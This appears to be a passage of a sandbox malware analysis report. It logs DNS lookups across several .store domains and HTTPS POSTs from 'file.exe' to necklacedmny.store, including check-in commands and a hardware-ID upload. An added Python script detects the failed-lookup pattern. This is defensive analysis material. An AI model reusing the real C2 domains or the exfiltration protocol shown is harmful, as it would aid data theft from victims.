Oct 31, 2024 11:27:50.218072891 CET | 53 | 60473 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 11:27:50.219788074 CET | 56136 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 11:27:50.235841990 CET | 53 | 56136 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 11:27:50.243010044 CET | 52698 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 11:27:50.252259970 CET | 53 | 52698 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 11:27:50.254410028 CET | 57112 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 11:27:50.268296957 CET | 53 | 57112 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 11:27:50.193063974 CET | 192.168.2.5 | 1.1.1.1 | 0x3c4c | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.209111929 CET | 192.168.2.5 | 1.1.1.1 | 0xc284 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.219788074 CET | 192.168.2.5 | 1.1.1.1 | 0xc63f | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.243010044 CET | 192.168.2.5 | 1.1.1.1 | 0xc2e7 | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.254410028 CET | 192.168.2.5 | 1.1.1.1 | 0x2692 | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 11:27:50.202379942 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4c | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.218072891 CET | 1.1.1.1 | 192.168.2.5 | 0xc284 | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.235841990 CET | 1.1.1.1 | 192.168.2.5 | 0xc63f | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.252259970 CET | 1.1.1.1 | 192.168.2.5 | 0xc2e7 | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.268296957 CET | 1.1.1.1 | 192.168.2.5 | 0x2692 | No error (0) | necklacedmny.store |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:27:50.268296957 CET | 1.1.1.1 | 192.168.2.5 | 0x2692 | No error (0) | necklacedmny.store |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
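The five lookups above leave the host within about 60 ms, four come back NXDOMAIN and only the last one resolves, which is consistent with the sample trying a list of configured C2 domains until one answers. As an added example (not part of the Joe Sandbox report), the following Python flags that pattern in a DNS answer log. The one-line-per-answer log format, the 5-second window and the three-failure threshold are this example's assumptions; the records are constructed from the table above, with the nanosecond timestamps truncated to microseconds and one unrelated client added as noise.

```python
"""Flag a DNS 'try each configured domain until one resolves' burst.

Added example, not part of the Joe Sandbox report. Works on a constructed
one-line-per-answer log modelled on the DNS tables in the report; the log
format, the window and the failure threshold are this example's assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed from the report's DNS answer table (timestamps truncated to
# microseconds, CET kept as naive local time). The last line is filler
# noise from an unrelated client with a TEST-NET address.
SAMPLE_DNS_LOG = """\
2024-10-31T11:27:50.202379 192.168.2.5 0x3c4c NXDOMAIN presticitpo.store -
2024-10-31T11:27:50.218072 192.168.2.5 0xc284 NXDOMAIN crisiwarny.store -
2024-10-31T11:27:50.235841 192.168.2.5 0xc63f NXDOMAIN fadehairucw.store -
2024-10-31T11:27:50.252259 192.168.2.5 0xc2e7 NXDOMAIN thumbystriw.store -
2024-10-31T11:27:50.268296 192.168.2.5 0x2692 NOERROR necklacedmny.store 188.114.96.3
2024-10-31T11:27:50.268296 192.168.2.5 0x2692 NOERROR necklacedmny.store 188.114.97.3
2024-10-31T11:30:00.000000 192.168.2.7 0x0001 NOERROR example.com 192.0.2.1
"""


def parse_dns_log(text):
    """Parse 'timestamp client txid rcode name answer' lines ('-' = no answer)."""
    records = []
    for line in text.splitlines():
        ts, client, txid, rcode, name, answer = line.split()
        records.append({
            "ts": datetime.fromisoformat(ts), "client": client, "txid": txid,
            "rcode": rcode, "name": name.lower(),
            "answer": None if answer == "-" else answer,
        })
    return records


def find_fallback_resolution(records, window=timedelta(seconds=5), min_failures=3):
    """Return one finding per NXDOMAIN burst that ends in a successful answer.

    Per client, keep the distinct names that got NXDOMAIN inside `window`.
    When a NOERROR answer arrives while at least `min_failures` such names
    are pending, report them together with the name that finally resolved,
    every address it resolved to (one log line per A record) and the TLDs
    involved, so the analyst can see whether the whole list shares one TLD.
    """
    by_client = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        by_client[r["client"]].append(r)

    findings = []
    for client, recs in by_client.items():
        failed = {}           # failed name -> time of its NXDOMAIN
        open_finding = None   # finding still collecting A records for one txid
        for r in recs:
            failed = {n: t for n, t in failed.items() if r["ts"] - t <= window}
            if r["rcode"] == "NXDOMAIN":
                failed[r["name"]] = r["ts"]
                open_finding = None
            elif r["rcode"] == "NOERROR" and r["answer"]:
                if open_finding and open_finding["txid"] == r["txid"]:
                    open_finding["addresses"].append(r["answer"])
                elif len(failed) >= min_failures:
                    names = list(failed) + [r["name"]]
                    open_finding = {
                        "client": client, "txid": r["txid"],
                        "failed_names": list(failed),
                        "resolved_name": r["name"],
                        "addresses": [r["answer"]],
                        "tlds": sorted({n.rsplit(".", 1)[-1] for n in names}),
                        "span": r["ts"] - min(failed.values()),
                    }
                    findings.append(open_finding)
    return findings


if __name__ == "__main__":
    for f in find_fallback_resolution(parse_dns_log(SAMPLE_DNS_LOG)):
        print(f"{f['client']}: {len(f['failed_names'])} NXDOMAIN then "
              f"{f['resolved_name']} -> {', '.join(f['addresses'])} "
              f"in {f['span'].total_seconds():.3f}s (TLDs: {f['tlds']})")
```

Run against the constructed log, the detector reports a single burst for 192.168.2.5: four failed `.store` names followed by `necklacedmny.store` resolving to both 188.114.96.3 and 188.114.97.3 within 66 ms. The window and threshold are deliberately loose; what makes the signal strong on a real resolver log is the combination of short spacing, a shared fresh TLD and the same client process behind every query.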
                                                                • necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | 6764 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:27:51 UTC | 265 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
2024-10-31 10:27:51 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-31 10:27:51 UTC | 1017 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 10:27:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=6qugag829aos5a1dj3hs486e5e; expires=Mon, 24-Feb-2025 04:14:30 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZEKh283v3dkxdJH7uikhfDr0N9%2FJ6Vc3Q9Vki1f3atfWc5krCCj7VDmOSzdDtam5kevGqdYCgJFterXhzO%2BFTQlDb3BFjPoam7fXeQS%2BcY0cnV%2BeB8k7xoxShcW0Mt%2Frx85Rukc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db2f4754e58e7f3-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1684&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1737252&cwnd=194&unsent_bytes=0&cid=2853427ee9405f19&ts=762&x=0"
2024-10-31 10:27:51 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-10-31 10:27:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 6764 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:27:52 UTC | 266 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: necklacedmny.store
2024-10-31 10:27:52 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-31 10:27:52 UTC | 1017 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 10:27:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=mdf6ni9arqvdioorbgi5fb7eok; expires=Mon, 24-Feb-2025 04:14:31 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysEuHBhuzaNG0LBR57qrOheUJQe3ZMpWOlfE9OxNeURD5ZZm0xN06nkKG6K9nSigOd2NEDg%2Buq1GyM112yGtjnTIwwBXZwD%2BN9EcLaxm%2B0pvjjjz2du53nD35Th5zlFD%2F%2FKdLrY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db2f47d1c102ca5-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=2683966&cwnd=251&unsent_bytes=0&cid=76d3650a98467175&ts=501&x=0"
2024-10-31 10:27:52 UTC | 352 | IN | Data Raw: 34 65 30 0d 0a 37 2f 6d 4d 69 37 52 4f 72 36 79 6f 71 78 69 67 64 6d 57 35 35 48 72 52 67 5a 34 66 65 33 6b 4c 5a 52 35 6e 4a 37 43 4a 68 64 2b 55 32 2f 71 70 6a 6e 71 44 6a 74 76 4f 4f 70 6f 43 46 38 79 42 56 76 50 67 2b 6a 31 42 48 32 6f 4a 62 51 49 4c 6b 76 2f 6f 2f 64 57 66 37 65 66 48 4b 34 4f 4f 7a 64 4d 36 6d 69 30 65 6d 34 45 55 38 37 75 38 65 68 45 62 61 67 6c 38 42 6b 7a 66 2b 65 6d 38 68 35 58 72 34 39 45 74 79 38 33 45 78 6e 33 46 45 77 54 54 69 68 4f 38 36 66 4d 39 56 31 74 75 48 7a 78 64 42 66 33 73 38 62 36 69 6d 50 2f 67 6c 6a 4f 44 31 34 72 4f 64 6f 4a 4d 52 39 69 42 47 4c 33 6e 2b 6e 51 54 45 57 4d 42 66 51 4e 4e 77 4f 44 6a 74 34 65 62 36 4f 4c 62 4a 4e 2f 41 7a 73 46 32 77 78 6b 45 6d 38 68 59 74 50 75 38 4a 56 6c 49 57 77 52 74 46 46
    Data Ascii: 4e07/mMi7ROr6yoqxigdmW55HrRgZ4fe3kLZR5nJ7CJhd+U2/qpjnqDjtvOOpoCF8yBVvPg+j1BH2oJbQILkv/o/dWf7efHK4OOzdM6mi0em4EU87u8ehEbagl8Bkzf+em8h5Xr49Ety83Exn3FEwTTihO86fM9V1tuHzxdBf3s8b6imP/gljOD14rOdoJMR9iBGL3n+nQTEWMBfQNNwODjt4eb6OLbJN/AzsF2wxkEm8hYtPu8JVlIWwRtFF
2024-10-31 10:27:52 UTC | 903 | IN | Data Raw: 58 49 63 33 63 77 73 4a 78 78 77 59 4d 30 6f 73 56 73 2b 37 32 63 68 6f 62 62 67 31 32 43 6b 2f 57 35 75 71 37 6a 5a 75 75 70 35 59 72 31 59 36 53 69 56 6e 48 42 41 44 58 6b 46 71 4a 6f 2b 4d 7a 41 46 74 75 43 7a 78 64 42 64 72 75 35 4c 36 47 6c 4f 33 68 33 54 37 4e 33 4d 7a 45 66 39 41 53 41 74 57 4d 47 36 48 70 38 6e 73 61 45 6d 49 4f 65 51 4a 42 6b 71 57 6e 75 70 58 62 74 71 6e 33 49 63 62 43 77 4e 35 36 67 67 74 4a 77 73 59 66 76 36 4f 6b 50 52 30 61 62 51 5a 34 43 30 76 57 35 2b 47 7a 67 4a 54 6f 34 39 59 72 78 38 62 43 79 48 66 4a 47 77 66 65 69 78 79 31 37 2f 31 34 57 56 55 70 41 47 52 46 48 5a 4c 46 34 4c 36 66 32 64 76 71 32 43 4c 4b 32 49 72 57 4e 4e 74 55 41 4e 66 47 51 50 50 74 2b 58 49 4c 47 6e 73 43 63 68 64 4a 31 2b 33 71 76 6f 4f 62 36 2b
    Data Ascii: XIc3cwsJxxwYM0osVs+72chobbg12Ck/W5uq7jZuup5Yr1Y6SiVnHBADXkFqJo+MzAFtuCzxdBdru5L6GlO3h3T7N3MzEf9ASAtWMG6Hp8nsaEmIOeQJBkqWnupXbtqn3IcbCwN56ggtJwsYfv6OkPR0abQZ4C0vW5+GzgJTo49Yrx8bCyHfJGwfeixy17/14WVUpAGRFHZLF4L6f2dvq2CLK2IrWNNtUANfGQPPt+XILGnsCchdJ1+3qvoOb6+
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 33 66 38 63 0d 0a 77 38 42 6f 79 42 67 4a 79 59 73 53 74 75 33 77 65 42 59 62 61 41 5a 79 44 30 36 53 70 61 65 36 6c 64 75 32 71 66 6b 68 33 64 7a 41 77 6d 75 41 49 51 54 56 69 42 2b 6c 6f 2b 4d 7a 41 46 74 75 43 7a 78 64 42 64 6e 74 36 37 47 4e 6e 66 7a 6e 32 54 37 48 33 4d 37 48 66 73 34 61 44 74 61 4a 48 61 48 6e 2f 47 38 59 48 6d 34 4a 63 52 64 41 6b 71 57 6e 75 70 58 62 74 71 6e 73 47 4d 72 65 32 38 34 34 39 78 63 4a 31 59 45 4f 38 2f 79 79 5a 46 6b 63 5a 55 63 6b 52 55 62 65 35 75 36 34 67 6f 6e 6b 35 64 63 2b 79 73 66 44 77 33 76 4d 47 77 7a 58 67 77 71 34 37 50 52 79 47 42 5a 6b 44 48 67 46 42 5a 79 72 34 4b 58 4e 77 36 37 49 32 79 50 66 7a 64 75 4c 54 38 45 61 43 64 79 51 57 4b 79 74 35 54 30 65 46 79 6c 66 50 41 52 4a 33 75 72 6f 75 34 65 54 37
    Data Ascii: 3f8cw8BoyBgJyYsStu3weBYbaAZyD06Spae6ldu2qfkh3dzAwmuAIQTViB+lo+MzAFtuCzxdBdnt67GNnfzn2T7H3M7Hfs4aDtaJHaHn/G8YHm4JcRdAkqWnupXbtqnsGMre28449xcJ1YEO8/yyZFkcZUckRUbe5u64gonk5dc+ysfDw3vMGwzXgwq47PRyGBZkDHgFBZyr4KXNw67I2yPfzduLT8EaCdyQWKyt5T0eFylfPARJ3urou4eT7
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 4a 7a 73 66 43 64 4d 77 64 43 39 4f 4b 48 36 48 75 2b 58 55 54 45 6d 77 4c 63 51 5a 58 30 65 71 6e 38 38 32 63 39 71 6d 4f 62 4f 72 39 2f 65 6f 36 33 56 6f 65 6d 34 45 55 38 37 75 38 66 42 45 63 5a 77 4e 75 43 31 66 63 37 4f 65 37 68 5a 50 70 35 64 67 69 33 38 62 4c 79 58 54 4e 48 41 37 66 68 78 79 33 37 2f 73 39 56 31 74 75 48 7a 78 64 42 66 72 6f 2f 61 66 50 74 65 58 70 30 54 7a 62 31 59 72 57 4e 4e 74 55 41 4e 66 47 51 50 50 6e 39 33 63 51 47 47 41 44 63 51 56 4d 33 65 4c 76 73 49 57 4a 37 2b 50 45 4b 4d 6a 50 78 63 4e 2b 79 68 67 49 31 34 49 4b 75 4b 4f 79 50 52 34 44 4b 56 38 38 4a 55 37 45 79 50 57 76 7a 59 53 67 38 4a 59 72 77 59 36 53 69 58 50 4f 46 51 62 52 67 42 4f 32 37 76 78 34 45 78 78 6c 42 33 77 47 51 39 54 6d 37 37 57 42 6c 2b 33 6b 30 79
    Data Ascii: JzsfCdMwdC9OKH6Hu+XUTEmwLcQZX0eqn882c9qmObOr9/eo63Voem4EU87u8fBEcZwNuC1fc7Oe7hZPp5dgi38bLyXTNHA7fhxy37/s9V1tuHzxdBfro/afPteXp0Tzb1YrWNNtUANfGQPPn93cQGGADcQVM3eLvsIWJ7+PEKMjPxcN+yhgI14IKuKOyPR4DKV88JU7EyPWvzYSg8JYrwY6SiXPOFQbRgBO27vx4ExxlB3wGQ9Tm77WBl+3k0y
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 78 33 76 45 47 41 71 62 79 46 69 30 2b 37 77 6c 57 54 78 7a 43 6e 6f 53 56 4f 66 73 35 2b 7a 4e 68 4b 44 77 6c 69 76 42 6a 70 4b 4a 64 38 34 65 43 74 36 43 45 4c 54 67 2f 58 45 64 46 6d 51 44 64 51 46 41 77 50 6e 68 73 34 32 55 34 4f 62 61 50 73 50 4c 79 73 55 36 6a 46 51 41 77 38 5a 41 38 39 4c 72 66 56 6b 45 4a 78 34 38 41 6b 6d 53 73 36 65 79 67 49 6e 69 35 74 59 74 7a 73 72 42 7a 6e 7a 45 46 51 54 65 68 52 32 31 34 76 78 78 45 78 78 68 44 58 49 49 51 39 62 74 34 66 33 44 32 2b 6e 78 6c 6e 53 4e 2f 4d 66 48 63 38 45 53 43 73 32 75 4b 66 50 38 73 6d 52 5a 48 47 56 48 4a 45 56 42 32 65 50 72 75 49 57 65 37 2b 48 63 4a 4d 4c 42 32 4d 68 31 79 78 4d 4d 31 6f 6b 57 74 75 33 75 65 68 49 51 59 51 35 79 41 77 57 63 71 2b 43 6c 7a 63 4f 75 33 39 55 69 78 74 2f
    Data Ascii: x3vEGAqbyFi0+7wlWTxzCnoSVOfs5+zNhKDwlivBjpKJd84eCt6CELTg/XEdFmQDdQFAwPnhs42U4ObaPsPLysU6jFQAw8ZA89LrfVkEJx48AkmSs6eygIni5tYtzsrBznzEFQTehR214vxxExxhDXIIQ9bt4f3D2+nxlnSN/MfHc8ESCs2uKfP8smRZHGVHJEVB2ePruIWe7+HcJMLB2Mh1yxMM1okWtu3uehIQYQ5yAwWcq+ClzcOu39Uixt/
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 42 55 49 6d 38 68 59 74 50 75 38 4a 56 6b 71 66 77 42 37 43 67 66 37 37 50 79 38 68 35 6a 6c 35 5a 59 7a 67 39 65 4b 7a 6e 61 43 54 45 66 57 69 68 57 33 38 66 42 39 47 52 4a 75 44 57 34 4b 53 74 2f 6f 35 37 69 66 6d 76 7a 6d 33 53 6e 4f 79 73 58 47 64 73 6f 65 52 35 58 47 48 36 75 6a 70 44 30 31 47 48 67 4e 50 69 4a 66 78 4f 7a 72 72 49 61 57 34 71 6e 4a 59 74 53 4f 7a 63 55 36 6d 6c 51 48 32 6f 73 4b 74 75 4c 32 64 78 51 54 5a 67 4a 35 43 6b 48 57 34 4f 6d 76 67 35 54 75 37 39 30 74 79 4d 33 42 77 33 54 4c 42 6b 65 56 78 68 2b 72 6f 36 51 39 4d 77 42 6f 43 6e 42 48 61 39 6e 39 34 50 2b 73 6c 65 58 75 32 6a 71 4e 30 59 54 51 4f 73 55 59 52 34 50 47 45 62 33 76 2f 33 6f 52 45 32 77 48 64 77 56 4b 32 4f 58 67 72 34 65 58 35 50 76 5a 4c 38 44 4b 78 38 4e 2f
    Data Ascii: BUIm8hYtPu8JVkqfwB7Cgf77Py8h5jl5ZYzg9eKznaCTEfWihW38fB9GRJuDW4KSt/o57ifmvzm3SnOysXGdsoeR5XGH6ujpD01GHgNPiJfxOzrrIaW4qnJYtSOzcU6mlQH2osKtuL2dxQTZgJ5CkHW4Omvg5Tu790tyM3Bw3TLBkeVxh+ro6Q9MwBoCnBHa9n94P+sleXu2jqN0YTQOsUYR4PGEb3v/3oRE2wHdwVK2OXgr4eX5PvZL8DKx8N/
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 66 47 51 50 50 6a 2b 48 45 61 48 47 63 49 63 51 70 43 32 65 54 74 73 35 2b 55 36 2b 48 61 4a 4d 44 63 77 4d 4e 6f 79 78 30 4b 31 59 34 4b 73 4b 4f 79 50 52 34 44 4b 56 38 38 4e 30 2f 52 35 2f 47 77 67 74 76 78 70 38 39 73 79 73 4b 4b 6b 54 72 51 42 67 66 51 68 68 2b 39 38 66 31 31 46 68 46 70 41 58 63 50 52 74 76 76 36 62 53 4c 6d 75 50 6f 31 79 7a 49 7a 73 50 62 64 34 4a 61 52 39 79 65 57 4f 75 6a 79 33 45 53 4b 6d 6f 52 50 42 6f 4c 79 36 76 67 73 63 33 44 72 75 6a 45 49 63 58 4b 79 73 52 38 79 52 55 47 32 49 59 59 73 4f 50 35 64 68 59 64 62 67 70 32 44 45 7a 41 34 2b 4f 76 6a 5a 66 71 71 5a 68 73 79 74 61 4b 6b 54 72 79 46 77 7a 58 68 68 57 6d 6f 2b 4d 7a 41 46 74 75 43 7a 78 64 42 64 72 67 37 4c 75 47 6d 4f 33 6e 33 53 62 43 77 63 44 50 66 4d 6f 52 42
    Data Ascii: fGQPPj+HEaHGcIcQpC2eTts5+U6+HaJMDcwMNoyx0K1Y4KsKOyPR4DKV88N0/R5/Gwgtvxp89sysKKkTrQBgfQhh+98f11FhFpAXcPRtvv6bSLmuPo1yzIzsPbd4JaR9yeWOujy3ESKmoRPBoLy6vgsc3DrujEIcXKysR8yRUG2IYYsOP5dhYdbgp2DEzA4+OvjZfqqZhsytaKkTryFwzXhhWmo+MzAFtuCzxdBdrg7LuGmO3n3SbCwcDPfMoRB
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 78 34 76 46 74 48 6c 73 6e 52 33 70 46 48 59 4b 6c 70 37 6d 63 32 37 61 35 68 48 65 59 6e 5a 32 5a 4b 4e 31 61 48 70 75 51 57 4f 75 78 73 6a 30 4c 57 7a 46 48 4f 77 5a 58 77 4f 33 6b 71 34 37 63 30 4e 66 32 4a 38 48 4e 78 73 68 39 67 6c 70 48 31 4d 5a 41 69 71 50 2f 62 77 74 55 65 42 46 78 46 55 4b 65 34 2f 61 77 67 64 75 67 71 5a 6f 6f 78 73 4c 50 7a 6d 71 4e 42 68 66 51 69 67 37 2f 35 2b 34 39 56 31 74 34 44 48 4d 58 53 39 57 6b 39 71 75 41 69 2b 33 73 30 57 44 46 33 38 66 46 4f 6f 78 55 45 74 43 4b 48 72 37 32 73 32 77 50 47 48 38 41 4d 41 31 55 33 2b 65 6e 67 73 50 62 39 71 6d 4f 62 50 6a 4e 78 4d 64 39 31 41 56 4b 2b 34 30 55 73 4f 2f 39 65 6c 6c 56 4b 51 45 38 58 52 61 63 71 2b 4f 73 7a 63 4f 2b 75 34 31 35 6e 70 6d 61 6d 32 57 4d 44 55 66 4e 78 6b
    Data Ascii: x4vFtHlsnR3pFHYKlp7mc27a5hHeYnZ2ZKN1aHpuQWOuxsj0LWzFHOwZXwO3kq47c0Nf2J8HNxsh9glpH1MZAiqP/bwtUeBFxFUKe4/awgdugqZooxsLPzmqNBhfQig7/5+49V1t4DHMXS9Wk9quAi+3s0WDF38fFOoxUEtCKHr72s2wPGH8AMA1U3+engsPb9qmObPjNxMd91AVK+40UsO/9ellVKQE8XRacq+OszcO+u415npmam2WMDUfNxk
2024-10-31 10:27:52 UTC | 1369 | IN | Data Raw: 50 51 74 62 4d 55 63 37 43 30 6a 54 36 4f 6d 2b 6e 34 6e 6f 36 73 41 76 69 76 44 30 37 48 66 50 45 51 6e 63 75 43 61 53 36 65 78 77 46 68 78 58 4f 55 73 55 51 73 4b 70 77 62 36 62 6d 4b 36 6e 6c 6a 53 4e 6c 6f 72 6f 63 4e 49 5a 43 4e 7a 47 56 76 50 6e 76 43 56 5a 50 6d 51 4b 65 51 74 43 6b 4d 72 74 72 59 43 55 36 61 6d 59 62 4d 47 4f 6b 6f 6c 37 79 41 51 4b 31 49 46 55 74 50 6e 37 50 56 64 62 5a 30 63 6b 52 55 54 59 2b 2b 71 79 69 74 66 6f 35 39 68 73 30 6f 44 54 69 57 79 43 54 46 53 56 78 67 72 7a 75 37 77 36 46 78 5a 6f 42 48 49 47 56 38 44 74 35 4b 75 4f 33 4e 44 58 38 79 48 41 79 38 54 4f 52 50 77 31 44 63 75 4c 46 37 53 68 33 48 6f 50 47 46 63 35 53 78 52 43 77 71 6e 42 76 70 75 59 72 71 65 57 4e 49 32 57 69 75 68 77 30 68 6b 49 33 4d 51 34 74 50 58
    Data Ascii: PQtbMUc7C0jT6Om+n4no6sAvivD07HfPEQncuCaS6exwFhxXOUsUQsKpwb6bmK6nljSNlorocNIZCNzGVvPnvCVZPmQKeQtCkMrtrYCU6amYbMGOkol7yAQK1IFUtPn7PVdbZ0ckRUTY++qyitfo59hs0oDTiWyCTFSVxgrzu7w6FxZoBHIGV8Dt5KuO3NDX8yHAy8TORPw1DcuLF7Sh3HoPGFc5SxRCwqnBvpuYrqeWNI2Wiuhw0hkI3MQ4tPX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 6764 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:27:53 UTC | 284 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12840
    Host: necklacedmny.store
2024-10-31 10:27:53 UTC | 12840 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 39 32 39 36 42 32 30 33 42 36 32 45 37 32 34 33 38 34 33 45 43 44 46 34 45 42 45 46 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"959296B203B62E7243843ECDF4EBEF54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-31 10:27:54 UTC | 1026 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 10:27:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=koi3l8uubmk9oioptvudi6ksba; expires=Mon, 24-Feb-2025 04:14:33 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=565jWse0Z8TGNtTb5JKp%2FMsw%2F39A2RerJx62w1KhsxfB5nQZhW%2Fe5v284kN%2BNeVjdqSgVKVjzViKLyzNZncBc022QKxHGGP7jPlXrU0yHLaLHbQn%2Fou53Kk1p%2BQz%2F%2FdcaJ8yWUM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db2f485fee646ce-DFW
    alt-svc: h3=":443"; ma=86400
